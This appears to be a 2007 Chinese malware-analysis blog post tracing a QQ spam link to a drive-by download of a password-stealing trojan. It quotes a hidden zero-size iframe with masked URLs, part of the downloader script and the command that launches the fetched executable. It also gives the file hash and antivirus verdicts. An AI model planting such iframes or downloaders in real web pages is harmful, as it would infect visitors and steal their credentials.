03-29/小心QQ信息中的网址传播Trojan-PSW.Win32.Delf.qc/Trojan.PSW.Liumazi.kr(2版)

endurer 原创

2007-03-29 第2版 补充瑞星的回复
2007-03-28 第1版

QQ收到如下信息：
/---
看**被插，看少女激情，没有你看不到的，只有你想不到的，地址hxxp://www.luoliao*3***.info狼友们快来！ n(Z
---/

hxxp://www.luoliao*3***.info的主页包含代码：
/---
＜iframe src＝"hxxp://bbs.co**ocb***b*s.com/pic***.htm?18***88-1" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
---/

hxxp://bbs.co**ocb***b*s.com/pic***.htm?18***88-1包含代码：
/---
＜script src＝css.js＞＜/script＞
---/

css.js的内容为JavaScript脚本，主要功能是运行多重嵌套的自定义函数 gn(n)，利用 Microsoft.XMLHTTP 和 scripting.FileSystemObject 下载文件 cha.exe，保存为 %windir%，文件名由下面的代码：
/---
var number＝Math.random()*n;return Math.round(number)+'.exe'
---/
随机生成，并利用Shell.Application 对象 Q 的 ShellExecute 方法执行命令：%windir%/system32/cmd.exe /c %windir%/*****.exe 来运行。

文件说明符 : D:/test/cha.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-27 23:44:53
修改时间 : 2007-3-27 23:44:54
访问时间 : 2007-3-27 0:0:0
大小 : 22445 字节 21.941 KB
MD5 : 689f4a7e2aba9ebedea00d3a9eacef6a

Kaspersky 报为 Trojan-PSW.Win32.Delf.qc。

主　题：	病毒上报邮件分析结果－流水单号:6229241
发件人：	"" <send@rising.net.cn>

尊敬的客户，您好！
您的邮件已经收到，感谢您对瑞星的支持。

我们已经详细分析过您的问题和文件，以下是您上传的文件的分析结果：
1.文件名：cha.exe
病毒名：Trojan.PSW.Liumazi.kr

我们将在较新的19.16.32版本(瑞星2006的18.72.32版本)中处理解决，请您届时将您的瑞星软件升级到19.16.32(瑞星2006的18.72.32版本)版本并且打开监控中心全盘杀毒。如果我们在测试过程中发现问题的话，我们会推迟一到两版本后升级。